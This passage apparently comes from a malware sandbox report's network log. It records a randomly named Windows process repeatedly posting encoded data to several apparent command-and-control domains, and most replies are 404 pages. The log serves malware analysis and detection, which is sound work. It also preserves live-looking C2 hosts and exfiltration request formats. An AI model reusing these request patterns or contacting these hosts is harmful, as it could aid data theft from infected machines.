                                              Data Ascii: or:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is temp
                                              Sep 24, 2024 11:28:55.308656931 CEST | 1289 | IN
                                              Data Ascii: b Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070002</td><
                                              Sep 24, 2024 11:28:55.308684111 CEST | 16 | IN
                                              Data Ascii: body> </html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              39 | 192.168.11.30 | 49932 | 62.149.128.40 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:28:57.841571093 CEST | 2578 | OUT | POST /ytc6/ HTTP/1.1
                                              Host: www.chalet-tofane.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.chalet-tofane.net
                                              Referer: http://www.chalet-tofane.net/ytc6/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:28:57.841588974 CEST | 1335 | OUT
                                              Data Ascii: xSTmXtFjdhtol+CItyw/DrRDzOf6IrOcpUZZNVBP0CE3xL43WpjLzbDAj8tRjEvUJZ16k2B3+4qnSom40aso3JuoxYsf7pn2DebGHUU8PmbB2S9/FklEvqOuI++9e7xP/TBdEpk0L9tHIhuDRKJXyldLzH+aqnUYrf+L8eyMePORrCpy/eQiWCQh6ngS2XhCNlseMXdBdqe5Hqx23oLvM0t/KhWKJ3+/jQfaSlIWFCDWJVn3aiS
                                              Sep 24, 2024 11:28:58.047177076 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                              Cache-Control: private
                                              Content-Type: text/html; charset=utf-8
                                              Server: Microsoft-IIS/10.0
                                              X-Powered-By: ASP.NET
                                              Date: Tue, 24 Sep 2024 09:28:57 GMT
                                              Connection: close
                                              Content-Length: 4953
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                              Sep 24, 2024 11:28:58.047204971 CEST  1289  IN
                                              Data Ascii: or:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;}
                                              Sep 24, 2024 11:28:58.047282934 CEST  1289  IN
                                              Data Ascii: or:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is temp
                                              Sep 24, 2024 11:28:58.047295094 CEST  1289  IN
                                              Data Ascii: b Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070002</td><
                                              Sep 24, 2024 11:28:58.047378063 CEST  16  IN
                                              Data Ascii: body> </html>


                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                              40  192.168.11.30  49933  62.149.128.40  80  4076  C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Sep 24, 2024 11:29:00.588927031 CEST  497  OUT  GET /ytc6/?Nze=C0klVT&7LY=RYHehDtD4gH3OO31IF1CMhco/TkeBNw6MFMBy+BdKXE5DZh4a3B2rurujEnG5bf1mvjABP5LZTRjcv/BkHIagK+kDFYsdgHg6BKHRShVUN8HZR3SFfvrnus= HTTP/1.1
                                              Host: www.chalet-tofane.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:29:00.796921968 CEST  1289  IN  HTTP/1.1 404 Not Found
                                              Cache-Control: private
                                              Content-Type: text/html; charset=utf-8
                                              Server: Microsoft-IIS/10.0
                                              X-Powered-By: ASP.NET
                                              Date: Tue, 24 Sep 2024 09:28:59 GMT
                                              Connection: close
                                              Content-Length: 5093
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                              Sep 24, 2024 11:29:00.797023058 CEST  1289  IN
                                              Data Ascii: or:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;}
                                              Sep 24, 2024 11:29:00.797038078 CEST  1289  IN
                                              Data Ascii: or:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is temp
                                              Sep 24, 2024 11:29:00.797051907 CEST  1289  IN
                                              Data Ascii: b Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070002</td><
                                              Sep 24, 2024 11:29:00.797074080 CEST  156  IN
                                              Data Ascii: .com/fwlink/?LinkID=62293&amp;IIS70Error=404,0,0x80070002,17763">View more information &raquo;</a></p> </fieldset> </div> </div> </body> </html>


                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                              41  192.168.11.30  49934  3.33.130.190  80  4076  C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Sep 24, 2024 11:29:06.039757013 CEST  755  OUT  POST /clto/ HTTP/1.1
                                              Host: www.tracy.club
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.tracy.club
                                              Referer: http://www.tracy.club/clto/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY=drd3c1Uy8s+0AJvXT98dcc8NMeEu8N4X6EtB7S447VNLeQwT9DLXf7U/FXp1ulrqX4ySI7EXd4bfNlfwld6K5whXyi8QwjBRM3sMser0mcu2nWgNr6BGqGZVeY+QzUWo6p+4cNAlkZDv9zD5uVhpfT37XDGscAbrQ8bK90AZvK77ZzVHLBo9+4VrOfdJfVxAsQ==


                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                              42  192.168.11.30  49935  3.33.130.190  80  4076  C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Sep 24, 2024 11:29:08.673413038 CEST  775  OUT  POST /clto/ HTTP/1.1
                                              Host: www.tracy.club
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.tracy.club
                                              Referer: http://www.tracy.club/clto/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY=drd3c1Uy8s+0Bp/XDqIda88OQOEuuN4T6ExB7TNj7j9Le10TvSLXc7U/P3o9jFrlX42aI+8Xd4ffNhbwkuCN4ghV6C8SuTBRM3sMsdXOmdK2knwNpedBnmZadY+QkEWs6p+WcMcDka7v93P5uHE/ID35IzH7MDL7II/800o8vrzZckkdWCc/tYpGSewhdXwbxZhuaXWpnpcevd+ut/1z8pg=


                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                              43  192.168.11.30  49936  3.33.130.190  80  4076  C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Sep 24, 2024 11:29:11.312988043 CEST  2578  OUT  POST /clto/ HTTP/1.1
                                              Host: www.tracy.club
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.tracy.club
                                              Referer: http://www.tracy.club/clto/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:29:11.313014984 CEST  1314  OUT
                                              Data Ascii: QAW8yMQk5w7BuhXEfSBgdjm2CqG4hq28x50sfXWmZD6GV+J2Q5CYDMtcjhRUqv99JKBRV17biOt2cn603m64BmjnRCQoSO+JltOeX57UmnHdKD1TscKYUUhIVdXnSTwU5L4gB00+7KMSRmxemyW/dxKCSey6rH3rEgRDD17fIAawyGMHZPb5vox2G2aaRzQlBO0OClqx5/Nw0mOd456DadzOxnUzPQnMv0zFSBfmpzHFL86XF5w


                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                              44  192.168.11.30  49937  3.33.130.190  80  4076  C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Sep 24, 2024 11:29:14.967987061 CEST  490  OUT  GET /clto/?7LY=Qp1XfCdsz8OJJJz3TLMvRPkoQesp985Iik5z4QR2yU8MVGcZykeEfqsbCV0TqEvKQ9KXAOYCUdjrGVGtx/egw088kz0UgyxAMHlR0NaM1s+K0msQl8MqjSQ=&Nze=C0klVT HTTP/1.1
                                              Host: www.tracy.club
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:29:15.073584080 CEST  390  IN  HTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Tue, 24 Sep 2024 09:29:15 GMT
                                              Content-Type: text/html
                                              Content-Length: 250
                                              Connection: close
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?7LY=Qp1XfCdsz8OJJJz3TLMvRPkoQesp985Iik5z4QR2yU8MVGcZykeEfqsbCV0TqEvKQ9KXAOYCUdjrGVGtx/egw088kz0UgyxAMHlR0NaM1s+K0msQl8MqjSQ=&Nze=C0klVT"}</script></head></html>


                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                              45  192.168.11.30  49938  154.212.219.2  80  4076  C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Sep 24, 2024 11:29:20.777054071 CEST  770  OUT  POST /dq8w/ HTTP/1.1
                                              Host: www.prj81oqde1.buzz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.prj81oqde1.buzz
                                              Referer: http://www.prj81oqde1.buzz/dq8w/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY=muIxOGnLmLXLx3UMY6s9KVYP6v7Mw8yeIV5kVuLd2q3uSqa8YFS6Y/A11gaB0hXwWvLEznK7luIYix8co9YnfLz143uD1zNhDm+bJP8nidb/f4E4eFTNQfu0sKHXXNqVT4iUHgSIetAvY4rVEhVYGICsb0TAuPRiK3ZYAGS8IUZnWOpbH+hzAlrf0lo4VQXUjw==
                                              Sep 24, 2024 11:29:21.218245983 CEST  691  IN  HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:29:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                              46  192.168.11.30  49939  154.212.219.2  80  4076  C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Sep 24, 2024 11:29:23.632505894 CEST  790  OUT  POST /dq8w/ HTTP/1.1
                                              Host: www.prj81oqde1.buzz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.prj81oqde1.buzz
                                              Referer: http://www.prj81oqde1.buzz/dq8w/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY=muIxOGnLmLXLzXEMebs9dlYMxP7M+cyaIVlkVrr32Yjucue8bES6N/A1hQbFwhX3WvPMzmG7lucYi0YcougmF7z30XuFxzNhDm+bJOZKidD/fM44MkTOd/u386HXTNqRT4i6HhOmev4vY47VH1BbIICqGESEuqkwMm9JWlCGNExua5YBa9VxTFXyokFQXSWP+xNniN6TpyQJM3EU28mYjiE=
                                              Sep 24, 2024 11:29:23.946474075 CEST  691  IN  HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:29:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                              47  192.168.11.30  49940  154.212.219.2  80  4076  C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp  Bytes transferred  Direction  Data
                                              Sep 24, 2024 11:29:26.611701012 CEST  1289  OUT  POST /dq8w/ HTTP/1.1
                                              Host: www.prj81oqde1.buzz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.prj81oqde1.buzz
                                              Referer: http://www.prj81oqde1.buzz/dq8w/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:29:26.611759901 CEST  2618  OUT
                                              Data Ascii: tvT+IdGx9tnTl6zjYgatKUAZbFdONC9/AoSZEYJJ2soQ8/IkS/zz8Z7+8oh8xTa3yi9Q2xr5cBc7V4kbQXZfZFiNu46KiYvovriCmL29CJemtWh2JLT2ESbZYjeQEQR3oTFfHjtAONoFJ/H3qZlfj6vimLXcplH7E8lKRco4lW/750w4ODpImtRQfv51eiptC4Wm0+eZKRCGRZel4QR4hBIFnwhsxioXO5RsYF7UI6Mk8JfzZQZ
                                              Sep 24, 2024 11:29:27.043819904 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:29:26 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              48 | 192.168.11.30 | 49941 | 154.212.219.2 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:29:29.457438946 CEST | 495 | OUT | GET /dq8w/?7LY=rsgRN2uYsqPg3Qo/YYYAeG4xg8L475vmQkQHQbPGwaKvYIbbYiGFBNgcl1Tl9BL7RarA80Sklr82mx1ZpdFfI7nWlECEwgJhN036ZdAkz4rYHuoxU1i8U5s=&Nze=C0klVT HTTP/1.1
                                              Host: www.prj81oqde1.buzz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:29:29.773740053 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:29:29 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              49 | 192.168.11.30 | 49942 | 206.119.82.147 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:29:35.490955114 CEST | 755 | OUT | POST /vacs/ HTTP/1.1
                                              Host: www.wdeb18.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.wdeb18.top
                                              Referer: http://www.wdeb18.top/vacs/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY=AyUV9hAr58K3nbyvy3nWzC/MdC1rNcIblUAv8szOhROIzNLjQiSSxFeMDxX9kenBdtXneLf0p/I19MAkDHM0wOVhtvXbn32HoaRU4GqYSfWE6Tyerz4uJziXWTTBY9mG4oifxynsAPg2QRniiZI12AhJUGVTX7Kx3va4dHFVwjWA+KmNngrML2iKLLgRj2JGbQ==
                                              Sep 24, 2024 11:29:35.805591106 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:29:35 GMT
                                              Content-Type: text/html
                                              Content-Length: 138
                                              Connection: close
                                              ETag: "66aa3fcf-8a"
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              50 | 192.168.11.30 | 49943 | 206.119.82.147 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:29:38.345809937 CEST | 775 | OUT | POST /vacs/ HTTP/1.1
                                              Host: www.wdeb18.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.wdeb18.top
                                              Referer: http://www.wdeb18.top/vacs/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Ascii: 7LY=AyUV9hAr58K31rCvwWnWmS/NTi1rH8IXlU8v8ueTijqI2c7jCTSSwFeMXhX46unfdtbveKj0p/019NwkDwY3weVZkPXZj32HoaRU4GumSe+E6jCeqS4tETiIRTTBc9nP4oi9xz7SAK82QR3isoIy8AhDKGUcf43V2/aLN35u336C29XX6jfOYWenXKN5h0IdGRjawuLgeXK4bpugzHVA4uA=
                                              Sep 24, 2024 11:29:38.658900023 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:29:38 GMT
                                              Content-Type: text/html
                                              Content-Length: 138
                                              Connection: close
                                              ETag: "66aa3fcf-8a"
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              51 | 192.168.11.30 | 49944 | 206.119.82.147 | 80 | 4076 | C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 24, 2024 11:29:41.190337896 CEST | 2578 | OUT | POST /vacs/ HTTP/1.1
                                              Host: www.wdeb18.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.wdeb18.top
                                              Referer: http://www.wdeb18.top/vacs/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:29:41.190356970 CEST | 1314 | OUT
                                              Data Ascii: siTqWe4NZPoaqiQSWIrBUpEaSywTNSPbKaBGCOKC+EKmCCMV70sg2hQjjNMhK2gR9GwBB5SHDaC3AXdZ08t1vQUxP6fKf1XBeRUESn1HfRH9QDIWyzk2zvcecoMMfi6e2cGm7LTrO5AbHgZkuVhVfMzbltjV3jTub3ljaeyy3oFFzsQSmpcN9b0JW1yD+kOxiwFZhZZlbkAByYoeosTS1cQWFzbrKHaCaOWhwzpiWt3kLFqbcQ1
                                              Sep 24, 2024 11:29:41.505600929 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:29:41 GMT
                                              Content-Type: text/html
                                              Content-Length: 138
                                              Connection: close
                                              ETag: "66aa3fcf-8a"
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
